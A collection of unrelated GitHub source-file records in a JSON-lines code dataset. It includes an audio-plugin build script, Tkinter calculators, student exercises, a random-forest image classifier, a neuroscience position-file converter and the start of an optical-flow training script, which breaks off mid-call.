'ttlgen.py')\n\n ttls = []\n tasks = {}\n\n for plugin_name in plugins:\n source = '{0}/Bitrot{0}.cpp'.format(plugin_name)\n plugin = plugin_name.lower()\n\n for format, target in formats:\n target = target.format(plugin)\n\n # bloody windows tho\n w32 = w32_flags(bld, target)\n\n t = bld.shlib(features = 'cxx cxxshlib',\n source = [source],\n includes = ['../DPF/distrho', plugin_name, '../common'],\n cxxflags = ['-DDISTRHO_PLUGIN_TARGET_{0}'.format(format.upper())],\n name = '{0} ({1})'.format(plugin_name, format.upper()),\n target = target,\n install_path = '${{PREFIX}}/lib/{0}'.format(format))\n tasks[t.name] = t\n\n target = '{0}/{1}'.format(bundle, plugin)\n w32 = w32_flags(bld, plugin)\n\n lv2 = bld.shlib(features = 'cxx cxxshlib',\n source = [source],\n includes = ['../DPF/distrho', plugin_name, '../common'],\n cxxflags = ['-DDISTRHO_PLUGIN_TARGET_LV2'],\n name = '{0} (LV2)'.format(plugin_name),\n target = target,\n install_path = '${{PREFIX}}/lib/lv2/{0}'.format(bundle))\n\n extension = bld.env.cxxshlib_PATTERN\n extension = extension[(extension.rfind('.') + 1):]\n metasrc = bld(features = 'cxx cxxprogram',\n source = [source,\n '../common/MetadataGenerator.cpp'],\n includes = ['../DPF/distrho', plugin_name, '../common'],\n cxxflags = ['-DDISTRHO_PLUGIN_TARGET_LV2',\n '-DBITROT_BINARY_NAME=\"{0}.{1}\"'.format(\n plugin,\n extension,\n ),\n '-DBITROT_TTL_NAME=\"{0}.ttl\"'.format(\n plugin,\n ),\n '-Dprotected=public'], # ...pretend you didn't see that\n ldflags = [],\n name = '{0} (LV2 metadata generator)'.format(plugin),\n target = 'metagen/{0}'.format(plugin),\n install_path = None)\n\n # Restore the original environment for the metadata generator\n for k in metasrc.env.keys():\n del metasrc.env[k]\n metasrc.env.load('.default_env')\n\n ttl = bld(features = 'seq',\n rule = '\"{0}\" \"{1}\" ${{SRC}}'.format(sys.executable, ttlgen),\n source = 'metagen/{0}'.format(metasrc.env.cxxprogram_PATTERN % plugin),\n target = ['{0}/{1}.ttl'.format(bundle, plugin),\n '{0}/manifest.{1}.ttl'.format(bundle, plugin)],\n install_path = '${{PREFIX}}/lib/lv2/{0}'.format(bundle),\n 
name = '{0}.ttl'.format(plugin),\n use = metasrc.get_name(),\n cwd = os.path.join(bld.out_dir, 'plugins', bundle))\n ttls.append(ttl)\n\n bld.add_manual_dependency(\n bld.path.find_or_declare('{0}/manifest.ttl'.format(bundle)),\n bld.path.find_or_declare('{0}/manifest.{1}.ttl'.format(bundle, plugin)),\n )\n\n bld.add_manual_dependency(\n bld.path.find_or_declare('{0}/{1}.ttl'.format(bundle, plugin)),\n bld.path.find_or_declare(ttlgen),\n )\n\n bld.add_manual_dependency(\n bld.path.find_or_declare('{0}/manifest.ttl'.format(bundle, plugin)),\n bld.path.find_or_declare(ttlgen),\n )\n\n manifest = bld(features = 'seq',\n rule = '\"{0}\" \"{1}\"'.format(sys.executable, ttlgen),\n target = '{0}/manifest.ttl'.format(bundle),\n source = ['{0}/manifest.{1}.ttl'.format(bundle, x.lower()) for x in plugins],\n install_path = '${{PREFIX}}/lib/lv2/{0}'.format(bundle),\n name = 'manifest.ttl',\n use = ttl,\n cwd = os.path.join(bld.out_dir, 'plugins', bundle))\n\n if bld.env.PLATFORM == 'darwin':\n for plugin_name in plugins:\n name = '{0} (VST)'.format(plugin_name)\n vst = tasks[name]\n\n vst_bundle = 'Bitrot {0}.vst'.format(plugin_name)\n vst_bundle = bld.path.get_bld().make_node(vst_bundle)\n vst_bundle.mkdir()\n\n contents = vst_bundle.make_node('Contents')\n contents.mkdir()\n\n macos = contents.make_node('MacOS')\n macos.mkdir()\n\n resources = contents.make_node('Resources')\n resources.mkdir()\n\n pkginfo = contents.make_node('PkgInfo')\n pkginfo.write('BNDL????\\n')\n\n dylib = bld.env.cxxshlib_PATTERN % vst.target\n bld(features = 'seq',\n rule = 'cp ${SRC} ${TGT}',\n source = dylib,\n target = macos.make_node(dylib),\n shell = False,\n use = vst)\n\n info_plist = contents.make_node('Info.plist')\n info_plist.write(info_plist_template.format(\n dylib=dylib,\n name=plugin_name,\n version=bld.env.VERSION[0],\n ))\n\ninfo_plist_template = '''\\\n\n\n\n\n \n CFBundleExecutable\n {dylib}\n CFBundleInfoDictionaryVersion\n 6.0\n CFBundleName\n Bitrot {name} VST\n CFBundleIdentifier\n io.github.grejppi.bitrot.{name}\n CFBundlePackageType\n BNDL\n CFBundleVersion\n {version}\n CSResourcesFileMapped\n \n CFBundleSignature\n ????\n \n\n'''\n","repo_name":"grejppi/bitrot","sub_path":"plugins/wscript","file_name":"wscript","file_ext":"","file_size_in_byte":6961,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"77"} +{"seq_id":"14492099968","text":"from tkinter import *\n\n\n\n\ndef imcc():\n imc = Tk()\n imc.geometry('800x800')\n imc.rowconfigure(0, weight=1)\n imc.rowconfigure(1, weight=1)\n imc.rowconfigure(2, weight=1)\n imc.rowconfigure(3, weight=1)\n imc.rowconfigure(4, weight=1)\n \n \n \n imc.columnconfigure(0,weight=1)\n imc.columnconfigure(1,weight=1)\n imc.columnconfigure(2,weight=1)\n\n\n def imC():\n\n res['text'] = x = float( p.get() )/ ( float(alt.get())* float(alt.get()))\n \n if x > 18.5 and x < 25:\n saud['text'] = 'Saudavel'\n else:\n pass\n\n if x > 25:\n saud['text'] = 'Sobre peso'\n else:\n pass\n\n\n if x < 18.5:\n saud['text'] = 'Magro'\n\n\n\n\n #========================BACK END================================\n #=========================FRONT END=================================\n peso = Label(imc ,text ='Peso:',foreground = 'black',font= 'Arial 25')\n peso.grid(column =0,row = 0,sticky=NSEW)\n\n p = Entry(imc,font='40')\n p.grid(row = 0,column = 1,sticky=NSEW)\n\n\n altura= Label(imc ,text ='Altura:',foreground = 'black',font= 'Arial 25')\n altura.grid(column =0,row = 1,sticky=NSEW)\n\n alt = Entry(imc,font='40')\n alt.grid(row = 1,column 
= 1,sticky=NSEW)\n\n botao = Button(imc,text='IMC',foreground='black',command=imC)\n botao.grid(row=2,column=1,sticky=NSEW)\n\n\n res = Label(imc,text='resultado',font='Arial 25' )\n res.grid(row= 3,column=1,sticky=NSEW)\n\n saud = Label(imc,text='você esta...',font='Arial 25' )\n saud.grid(row= 4,column=1,sticky=NSEW)\n\n\n\n\n imc.mainloop()\n\n\n\n\n\n#======================= FAHRENHEIT ==================================\n\ndef fahren():\n grau = Tk()\n grau.geometry('400x400')\n grau.columnconfigure(0, weight=1)\n grau.columnconfigure(1, weight=1)\n\n\n grau.rowconfigure(0,weight=1)\n grau.rowconfigure(1,weight=1)\n\n\n\n def fah():\n resu['text'] = (float(entrada.get()) * 1.8) + 32\n\n\n\n # F = C*1.8 + 32\n #+===============Back end======\n #==========================================\n #=================FRONT END\n celsio = Label(grau,text='C°:',font='Arial 25')\n celsio.grid(row=0,column=0)\n\n\n entrada = Entry(grau,font='40')\n entrada.grid(row=0,column=1)\n\n botao = Button(grau,text = 'Converter °F',font='40',command=fah)\n botao.grid(row=1,column=0)\n\n\n resu= Label(grau,text='0',font='40')\n resu.grid(row=1,column=1)\n\n\n\n grau.mainloop()\n\n\n\n#===========================PAGINA PRINCIPAL=========================#\n\nal3 = Tk()\nal3.geometry('800x800')\nal3.columnconfigure(0, weight=1)\nal3.columnconfigure(1, weight=1)\nal3.columnconfigure(2, weight=1)\n\nal3.rowconfigure(1,weight=1)\nal3.rowconfigure(2,weight=1)\n\n\n\n\ntext = Label(al3,text='ESCOLHA A FUNÇÃO',font='200')\ntext.grid(row=1,column=1,sticky=NSEW)\n\n\ncont = Label(al3,text='',font='40')\ncont.grid(row=1,column=0,sticky=NSEW)\n\n\nbtn1 = Button(al3,text='IMC',font='Arial 12', bg='#240A09',fg='white',command=imcc)\nbtn1.grid(row=2,column=0,sticky=NSEW)\n\n\nbtn2 = Button(al3,text='F°',font='Arial 12',bg='#240A09',fg='white',command=fahren)\nbtn2.grid(row=2,column=2,sticky=NSEW)\n\n\n\n#===========================================================================\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nal3.mainloop()","repo_name":"JWsley/Aulas-Tkinter","sub_path":"AULA-3/aula 3_tkinter.py","file_name":"aula 3_tkinter.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74061901049","text":"\"\"\"\n1. find the minNum (finished)\n2. start serach and add number to string (working)\n3. 
stop\n\"\"\"\n_map = []\nr, c = map(int, input('').split(' '))\nfor i in range(r):\n \n temp = []\n temp = [int(i) for i in input('').split(' ')]\n _map.append(temp)\n\nminNum = 1000001\nnumx, numy = 0, 0\nfor i in range(r):\n for j in range(c):\n if _map[i][j] < minNum:\n minNum = _map[i][j]\n numx, numy = i, j\n\"\"\"up, down, right, left\"\"\"\n#print(minNum)\n\nnow = -1\nans = 0\n\nwhile True:\n moving = False\n\n if numx - 1 >= 0 : #up\n if _map[numx -1][numy] > now:\n now = _map[numx][numy]\n numx -= 1\n moving = True\n ans += now\n #print(now)\n\n if numx + 1 < r : #down\n if _map[numx + 1][numy] > now:\n now = _map[numx][numy]\n numx += 1\n moving = True\n ans += now\n #print(now)\n\n if numy - 1 >= 0 : #left\n if _map[numx][numy - 1] > now:\n now = _map[numx][numy - 1]\n numy -= 1\n moving = True\n ans += now\n #print(now)\n\n if numy + 1 < c : #right\n if _map[numx][numy+1] > now:\n now = _map[numx][numy+1]\n numy += 1 \n moving = True\n ans += now\n #print(now)\n\n if moving == False:\n print(ans + minNum)\n break","repo_name":"bochainwu/APCS-record","sub_path":"1086/10862.py","file_name":"10862.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"29462229779","text":"def jerigonzo(string):\n palabra = \"\"\n vocal = [\"a\", \"e\", \"i\", \"o\", \"u\"]\n for i in string:\n if i in vocal:\n palabra += i\n palabra += \"p\"\n palabra += i\n else:\n palabra +=i\n return palabra\ndef rot13(palabra):\n abecedario = \"abcdefghijklmnopqrstuvwxyz\"\n resultado = \"\"\n for letra in palabra:\n resultado += abecedario[(abecedario.find(letra)+13)%26]\n return resultado\n ","repo_name":"pabloschwarzenberg/grader","sub_path":"tema4_ej3/tema4_ej3_918c8c1cac0c377996b3cdeece3eaa2a.py","file_name":"tema4_ej3_918c8c1cac0c377996b3cdeece3eaa2a.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37080110668","text":"cfg_mk = {\n 'diff_area_noise': False, # Add selective recurrent noise to areas\n 'area_noise': 3,\n\n 'linear_mut_info': False, # True if you want the linear decoder\n\n 'path': '/Users/michael/Documents/GitHub/multi-area-cleaned/',\n 'rnn_datapath': '/Users/michael/Documents/GitHub/multi-area-cleaned/saved_rnns_server_apr/data/',\n 'suffix': '', # _outputpos\n 'use_dale': True, # only matters for analysis of mi\n 'rnn_areas': 3, # only matters for analysis\n 'modelpath': '2020-04-10_cb_simple_3areas', # _nodale_ff=0p1', # make sure this matches num_rnn_areas\n 'num_units': 300,\n 'num_seeds': 8, # -1 if did not specify\n\n 'gamma_rec': True, # True if recurrent distribution for Crec is gamma\n 'random_mask_wrec': False, # default is False\n 'random_mask_win': False, # default is False\n 'random_mask_wout': False, # default is False\n 'make_positive': True, # default is true (for training)\n 'positive_ic': True, # default is true\n 'make_positive_output': True, # default is true, False for standard noDale\n\n 'remove_check_noise_before_cue': True # For analysis, esp dpca, removing noise before go cue (default True)\n }\n","repo_name":"mjkleinman/multi-area-cleaned","sub_path":"cfg_mk.py","file_name":"cfg_mk.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"36996378974","text":"import os\nimport datetime\nfrom core.readBin import get_raw_pos\nfrom core.Tint_Matlab import 
get_setfile_parameter\nimport struct\n\n\ndef get_set_header(set_filename):\n with open(set_filename, 'r+') as f:\n header = ''\n for line in f:\n header += line\n if 'sw_version' in line:\n break\n return header\n\n\ndef create_pos(pos_filename, set_filename, pos_data):\n n = int(pos_data.shape[0])\n\n if os.path.exists(pos_filename):\n return\n\n header = get_set_header(set_filename)\n\n with open(pos_filename, 'wb+') as f: # opening the .pos file\n write_list = []\n\n [write_list.append(bytes('%s\\r\\n' % value, 'utf-8')) for value in header.split('\\n') if value != '']\n\n header_vals = ['num_colours %d' % 4]\n\n '''\n if 'abid' in header.lower():\n header_vals.extend(\n ['\\r\\nmin_x %d' % 0,\n '\\r\\nmax_x %d' % 768,\n '\\r\\nmin_y %d' % 0,\n '\\r\\nmax_y %d' % 574])\n elif 'gus' in header.lower():\n header_vals.extend(\n ['\\r\\nmin_x %d' % 0,\n '\\r\\nmax_x %d' % 640,\n '\\r\\nmin_y %d' % 0,\n '\\r\\nmax_y %d' % 480]\n )\n else:\n header_vals.extend(\n ['\\r\\nmin_x %d' % 0,\n '\\r\\nmax_x %d' % 768,\n '\\r\\nmin_y %d' % 0,\n '\\r\\nmax_y %d' % 574]\n )\n '''\n\n header_vals.extend(\n ['\\r\\nmin_x %d' % 0,\n '\\r\\nmax_x %d' % 768,\n '\\r\\nmin_y %d' % 0,\n '\\r\\nmax_y %d' % 574]\n )\n\n header_vals.extend(\n ['\\r\\nwindow_min_x %d' % int(get_setfile_parameter('xmin', set_filename)),\n '\\r\\nwindow_max_x %d' % int(get_setfile_parameter('xmax', set_filename)),\n '\\r\\nwindow_min_y %d' % int(get_setfile_parameter('ymin', set_filename)),\n '\\r\\nwindow_max_y %d' % int(get_setfile_parameter('ymax', set_filename)),\n '\\r\\ntimebase %d hz' % 50,\n '\\r\\nbytes_per_timestamp %d' % 4,\n '\\r\\nsample_rate %.1f hz' % 50.0,\n '\\r\\nEEG_samples_per_position %d' % 5,\n '\\r\\nbearing_colour_1 %d' % 0,\n '\\r\\nbearing_colour_2 %d' % 0,\n '\\r\\nbearing_colour_3 %d' % 0,\n '\\r\\nbearing_colour_4 %d' % 0,\n '\\r\\npos_format t,x1,y1,x2,y2,numpix1,numpix2',\n '\\r\\nbytes_per_coord %d' % 2,\n '\\r\\npixels_per_metre %f' % float(\n get_setfile_parameter('tracker_pixels_per_metre', set_filename)),\n '\\r\\nnum_pos_samples %d' % n,\n '\\r\\ndata_start'])\n\n for value in header_vals:\n write_list.append(bytes(value, 'utf-8'))\n\n onespot = 1 # this is just in case we decide to add other modes.\n\n if onespot:\n position_format_string = 'i8h'\n position_format_string = '>%s' % (n * position_format_string)\n write_list.append(struct.pack(position_format_string, *pos_data.astype(int).flatten()))\n\n write_list.append(bytes('\\r\\ndata_end\\r\\n', 'utf-8'))\n f.writelines(write_list)\n\n\ndef convert_position(bin_filename, position_filename, set_filename, self=None):\n if not os.path.exists(position_filename):\n\n msg = '[%s %s]: Analyzing the following bin file: %s!' % \\\n (str(datetime.datetime.now().date()),\n str(datetime.datetime.now().time())[:8], bin_filename)\n\n if self is None:\n print(msg)\n else:\n self.LogAppend.myGUI_signal_str.emit(msg)\n\n msg = '[%s %s]: Reading in the position data!' % \\\n (str(datetime.datetime.now().date()),\n str(datetime.datetime.now().time())[:8])\n\n if self is None:\n print(msg)\n else:\n self.LogAppend.myGUI_signal_str.emit(msg)\n\n if not os.path.exists(bin_filename):\n\n msg = '[%s %s]: The following bin file does not exist: %s!' 
% \\\n (str(datetime.datetime.now().date()),\n str(datetime.datetime.now().time())[:8], bin_filename)\n\n if self is None:\n print(msg)\n else:\n self.LogAppend.myGUI_signal_str.emit(msg)\n\n raise FileNotFoundError(\"The following file does not exist: %s\" % bin_filename)\n\n raw_position = get_raw_pos(bin_filename) # vid time, x1, y1, x2, y2, numpix1, numpix2, total_pix, unused\n\n msg = '[%s %s]: Creating the .pos file!' % \\\n (str(datetime.datetime.now().date()),\n str(datetime.datetime.now().time())[:8])\n\n if self is None:\n print(msg)\n else:\n self.LogAppend.myGUI_signal_str.emit(msg)\n\n create_pos(position_filename, set_filename, raw_position)\n\n else:\n\n msg = '[%s %s]: The following position file already exists: %s!' % \\\n (str(datetime.datetime.now().date()),\n str(datetime.datetime.now().time())[:8], position_filename)\n\n if self is None:\n print(msg)\n else:\n self.LogAppend.myGUI_signal_str.emit(msg)\n","repo_name":"HussainiLab/BinMSGUI","sub_path":"BinMSGUI/core/convert_position.py","file_name":"convert_position.py","file_ext":"py","file_size_in_byte":5160,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"24356165814","text":"import pandas as pd\r\nimport numpy as np\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn import metrics \r\nimport time\r\nimport cv2\r\nimport glob\r\nfrom sklearn import tree\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn import metrics\r\nimport matplotlib.pyplot as plt\r\nimport pydot\r\nfrom io import StringIO\r\nfrom sklearn.tree import export_graphviz\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn import metrics\r\nfrom sklearn.model_selection import train_test_split\r\nimport cv2\r\nimport glob\r\nfrom sklearn import tree\r\nimport time\r\nimport matplotlib\r\nimport pydot\r\nfrom io import StringIO\r\ndef matrix(row,col,imgs):\r\n a = row*col\r\n vector_newX = np.zeros((a, 1))\r\n imgSeq = []\r\n for img in imgs :\r\n o=cv2.imread(img,0)\r\n #print(o)\r\n oriimg = cv2.imread(img, cv2.IMREAD_GRAYSCALE)/255.\r\n #pixel values divide by 255 so that they can be be between 0 and 1\r\n #print(oriimg)\r\n imgSeq.append(img.split('img_')[1].split('.jpg')[0])\r\n img0 = cv2.resize(oriimg,(row,col))\r\n flat = img0.reshape(a,1)\r\n vector_newX = np.c_[vector_newX,flat]\r\n #print(img)\r\n print(imgSeq[0],imgSeq[30],imgSeq[263])\r\n vector_newX = vector_newX.T\r\n finalX_train = vector_newX[1:,:]\r\n print('size of feature martix is:',np.shape(finalX_train))\r\n return finalX_train,imgSeq\r\n\r\ndef tree_function():\r\n \r\n mydata = pd.read_csv(r\"F:\\Trimester2\\BTP\\BTP\\Jan16\\Sobel_train.csv\",header = None)\r\n \r\n X = mydata.iloc[0:,:-1].values #iloc is a --> Purely integer-location based indexing for selection by position from data.\r\n print(X)\r\n Y = mydata.iloc[0:,-1].values\r\n print(Y)\r\n X=X/255.\r\n print(X)\r\n print(np.shape(X))\r\n print(np.shape(Y))\r\n \r\n X_train,X_test,Y_train,Y_test = train_test_split(X,Y,test_size = 0.2,random_state = 50)\r\n\r\n #Create Random Forest classifer object\r\n clf = RandomForestClassifier(n_estimators=50,criterion=\"entropy\")\r\n # Train Random Forest Classifer\r\n clf = clf.fit(X_train,Y_train)\r\n print('Random forest classifer: ')\r\n cnt=0\r\n for t in clf.estimators_:\r\n cnt+=1\r\n print(\"Decision Tree: \",cnt)\r\n r=tree.export_text(t)\r\n #print(r)\r\n 
print('total decision tree drawn: ',cnt)\r\n '''\r\n fn=data.feature_names\r\n cn=data.target_names\r\n fig, axes = plt.subplots(nrows = 1,ncols = 1,figsize = (4,4), dpi=800)\r\n tree.plot_tree(clf.estimators_[0],feature_names = fn,class_names=cn,filled = True);\r\n fig.savefig('clf_individualtree.png')\r\n '''\r\n #Predict the response for test dataset\r\n Y_pred = clf.predict(X_test)\r\n \r\n Accuracy = metrics.accuracy_score(Y_test, Y_pred)\r\n print(Y_pred)\r\n print(\" Accuracy:\",(Accuracy*100))\r\n return clf,Accuracy\r\n\r\ndef predict(X,imgSeq):\r\n Y_pred_case = clf.predict(X)\r\n print('Predicted Result:',Y_pred_case)\r\n imgLabel = pd.read_csv(\"F:\\Trimester2\\BTP\\BTP\\images\\ImageLabels.csv\")\r\n imgLabel[\"RandomForest_Gray\"]=''\r\n print(imgLabel.head(10))\r\n correct=0\r\n for i,val in enumerate(imgSeq):\r\n imgLabel.loc[imgLabel[\"image\"]==int(val),\"RandomForest_Gray\"]=Y_pred_case[i]\r\n if (Y_pred_case[i] in str(imgLabel.loc[imgLabel[\"image\"]==int(val)][\"label\"])):\r\n correct = correct+1\r\n print(imgLabel.head(10))\r\n total = len(imgSeq)\r\n genAcc = (correct/total) *100\r\n print(correct, \"Images classified correctly out of \",total, \"images\")\r\n print(\"General Accuracy: \",genAcc)\r\n imgLabel.to_csv(r\"F:\\Trimester2\\BTP\\BTP\\images\\updated_ImageLabels.csv\")\r\n\r\n\r\nrow = 64 #height of the image \r\ncol = 64 #width of the image \r\n\r\nimgs = glob.glob(r\"F:\\Trimester2\\BTP\\BTP\\test 500\\*.jpg\")\r\ncombined_train,imgSeq = matrix(row,col,imgs)\r\nclf,acc = tree_function()\r\nstart_time = time.time()\r\npredict(combined_train,imgSeq)\r\n#print(\"--- %s seconds ---\" % (time.time() - start_time))\r\n\r\ndef label(x):\r\n if x==0:\r\n return \"Normal Driving\"\r\n if x==1:\r\n return \"texting - right\"\r\n if x==2:\r\n return \"talking on phone - right\"\r\n if x==3:\r\n return \"texting - left\"\r\n if x==4:\r\n return \"talking on phone - left\"\r\n if x==5:\r\n return \"operating the radio\"\r\n if x==6:\r\n return \"drinking\"\r\n if x==7:\r\n return \"reaching behind\"\r\n if x==8:\r\n return \"hair and makeup\"\r\n if x==9:\r\n return \"talking to passenger\"\r\n\r\nimgs = glob.glob(r\"F:\\Trimester2\\BTP\\BTP\\Jan11\\Test\\*.jpg\")\r\nDDEPTH = cv2.CV_16S\r\nfor img in imgs:\r\n oriimg = cv2.imread(img,0)\r\n img0 = cv2.resize(oriimg,(64,64))\r\n\r\n img1 = cv2.GaussianBlur(img0, (3, 3), 2)\r\n\r\n gradx = cv2.Sobel(img1, DDEPTH , 1, 0, ksize=3, scale=1, delta=0)\r\n gradx = cv2.convertScaleAbs(gradx)\r\n \r\n grady = cv2.Sobel(img1, DDEPTH , 0, 1, ksize=3, scale=1, delta=0)\r\n grady = cv2.convertScaleAbs(grady)\r\n \r\n grad = cv2.addWeighted(gradx, 0.5, grady, 0.5, 0)\r\n #print(np.shape(grad))\r\n flat = grad.reshape(1,64*64)\r\n\r\n\r\n #flat = img0.reshape(1,64*64)\r\n state=clf.predict(flat)\r\n print(str(state[0]))\r\n lb=int(str(state[0])[1])\r\n print(lb)\r\n msg=label(lb)\r\n cv2.rectangle(oriimg, (40, 52), (420, 8), (255,255,255), cv2.FILLED)\r\n cv2.rectangle(oriimg, (40, 52), (420, 8), (0,0,0), 3)\r\n cv2.putText(oriimg, msg, (40, 40), cv2.FONT_HERSHEY_SIMPLEX, 1.15, (0, 255, 0), 2)\r\n cv2.imshow('Distraction',oriimg)\r\n cv2.waitKey(0)","repo_name":"jpvaishnav/Driver-Distraction-Detection","sub_path":"RandomForest.py","file_name":"RandomForest.py","file_ext":"py","file_size_in_byte":5547,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"1992135389","text":"N = int(input())\r\nnumbers = list(map(int, input().split()))\r\nX = [-1 for _ in range(N)]\r\nstacks = 
[]\r\nfor i in range(N-1, -1, -1):\r\n target = numbers[i]\r\n while stacks and stacks[-1] <= target:\r\n stacks.pop()\r\n if not stacks : X[i] = -1\r\n if stacks : X[i] = stacks[-1]\r\n stacks.append(target)\r\nprint(*X)","repo_name":"Kimsc9976/study_algorithm","sub_path":"백준/Gold/17298. 오큰수/오큰수.py","file_name":"오큰수.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18799674974","text":"def grader(score: float):\r\n \"\"\" determines the grade and grade point of a score\"\"\"\r\n score = float(score)\r\n if score > 100:\r\n raise ValueError('Score can\\'t be above 100!')\r\n elif score >= 70:\r\n grade, grade_point = 'A', 5\r\n elif score >= 60 and score <= 69:\r\n grade, grade_point = 'B', 4\r\n elif score >= 50 and score <= 59:\r\n grade, grade_point = 'C', 3\r\n elif score >= 45 and score <= 49:\r\n grade, grade_point = 'D', 2\r\n elif score >= 40 and score <= 44:\r\n grade, grade_point = 'E', 1\r\n elif score <= 39:\r\n grade, grade_point = 'F', 0\r\n return grade, grade_point\r\n\r\n\r\ndef gpaCalc(dict_of_results: dict):\r\n \"\"\"\r\n computes the gpa of student and the dict_of_results\r\n is updated with more info\r\n dict_of_results takes this format\r\n dict_of_results = {course_code: [unit, score]}\r\n tnu = Total No. of Units\r\n tcp = Total Credit Points\r\n \"\"\"\r\n tnu, tcp = 0, 0\r\n for course_code, list_of_info in dict_of_results.items():\r\n unit: int = list_of_info[0]\r\n score: int = list_of_info[1]\r\n grade = grader(score)[0]\r\n grade_point = grader(score)[1]\r\n credit_point = grade_point * unit\r\n dict_of_results[course_code].append((grade, grade_point, credit_point))\r\n tnu += unit\r\n tcp += credit_point\r\n gpa = tcp/tnu\r\n #since gpa is rounded accurately to 2 d.p\r\n return round(gpa, 2)\r\n\r\n#test code\r\ndude_results = {'MTH101': [4, 56],'CHM101': [5, 65],'PHY101': [3, 59],'CSC101': [1, 47]}\r\nprint(f'Your GPA is: {gpaCalc(dude_results)}')\r\n","repo_name":"BOVAGE/CSC201","sub_path":"gpacalc.py","file_name":"gpacalc.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"28737715939","text":"#!/usr/bin/env python\nimport os\nimport pymongo\nfrom datetime import datetime\n\nimport tensorflow as tf\n\nfrom config import configs\nfrom data_loader import get_loader\nfrom data_loader_w_events import get_loader as get_loader_events\nfrom EVFlowNet import EVFlowNet\n\nfrom termcolor import colored\nfrom sacred import Experiment\nfrom sacred.observers import MongoObserver\nfrom sacred.utils import apply_backspaces_and_linefeeds\n\n\ndef dump_to_yaml(args, path):\n with open(path, 'w') as fp:\n for k, v in vars(args).items():\n if isinstance(v, list):\n v = \"[\"+\"\".join([\"{}, \".format(z) for z in v])[:-len(\", \")]+\"]\"\n if isinstance(v, str) and len(v) == 0:\n continue\n if v is None:\n continue\n fp.write(\"{}: {}\\n\".format(k, v))\n\n\ndef mongo_compatible(obj):\n if isinstance(obj, dict):\n res = dict()\n for key, value in obj.items():\n key = key.replace(\".\", ',').replace(\"$\", \"S\")\n res[key] = mongo_compatible(value)\n return res\n elif isinstance(obj, (list, tuple)):\n return list([mongo_compatible(value) for value in obj])\n return obj\n\n\ndef main():\n args = configs()\n\n args.restore_path = None\n if args.training_instance:\n if \".ckpt\" in args.training_instance:\n training_dir, _ = os.path.splitext(args.training_instance)\n 
args.restore_path = args.training_instance\n else:\n args.restore_path = tf.train.latest_checkpoint(args.training_instance)\n training_dir = args.training_instance\n print(\"Restoring checkpoint:\", args.restore_path)\n\n args.load_path = os.path.join(args.load_path, training_dir)\n args.summary_path = os.path.join(args.summary_path, training_dir)\n else:\n args.load_path = os.path.join(args.load_path,\n \"evflownet_{}_{}\".format(datetime.now()\n .strftime(\"%m%d_%H%M%S\"),\n args.exp_name))\n args.summary_path = os.path.join(args.summary_path,\n \"evflownet_{}_{}\".format(datetime.now()\n .strftime(\"%m%d_%H%M%S\"),\n args.exp_name))\n\n os.makedirs(args.load_path)\n dump_to_yaml(args, os.path.join(args.load_path, \"args.yaml\"))\n\n if args.sacred:\n sacred_exp = Experiment(args.exp_name)\n sacred_exp.captured_out_filter = apply_backspaces_and_linefeeds\n conf = vars(args)\n conf.update({'log_dir': args.load_path})\n conf.update({'summary_path': args.summary_path})\n sacred_exp.add_config(mongo_compatible(conf))\n\n if not args.mongodb_disable:\n url = \"{0.mongodb_url}:{0.mongodb_port}\".format(args)\n db_name = args.mongodb_name\n\n overwrite = None\n if args.restore_path is not None:\n client = pymongo.MongoClient(url)\n database = client[db_name]\n runs = database[\"runs\"]\n matches = runs.find({\"config.log_dir\": args.load_path})\n if matches.count() > 1:\n raise ValueError(\"Multiple MongoDB entries found with the specified path!\")\n elif matches.count() == 0:\n raise ValueError(\"No MongoDB entriy found with the specified path!\")\n else:\n overwrite = matches[0]['_id']\n\n print(colored('Connect to MongoDB@{}:{}'.format(url, db_name), \"green\"))\n sacred_exp.observers.append(MongoObserver.create(url=url,\n db_name=db_name,\n overwrite=overwrite))\n\n if not os.path.exists(args.load_path):\n os.makedirs(args.load_path)\n if not os.path.exists(args.summary_path):\n os.makedirs(args.summary_path)\n\n # Fix the random seed for reproducibility.\n # Remove this if you are using this code for something else!\n tf.set_random_seed(12345)\n\n if args.do_aug_rewind:\n if args.no_aug_rot is False:\n raise ValueError(\"no_aug_rot = False Not supported when do_aug_rewind = True\")\n\n print(\"Using Event Loader for rewind augmentation!\")\n loader_vals = get_loader_events(\n args.data_path, args.batch_size, args.image_width, args.image_height,\n split='train',\n shuffle=True,\n sequence=args.sequences,\n rotation=not args.no_aug_rot,\n rewind=args.do_aug_rewind,\n flip_updown=args.do_aug_flip_updown,\n nskips=args.loader_n_skips,\n binarize_polarity=args.loader_binarize_polarity)\n (events_loader, lengths_loader,\n event_img_loader, prev_img_loader,\n next_img_loader, _, rot_angle, crop_bbox, n_ima) = loader_vals\n else:\n event_img_loader, prev_img_loader, next_img_loader, _, n_ima = get_loader(\n args.data_path, args.batch_size, args.image_width, args.image_height,\n split='train',\n shuffle=True,\n sequence=args.sequences,\n rotation=not args.no_aug_rot,\n flip_updown=args.do_aug_flip_updown,\n nskips=args.loader_n_skips,\n gzip=args.gzip)\n print(\"Number of images: {}\".format(n_ima))\n \n trainer = EVFlowNet(args,\n 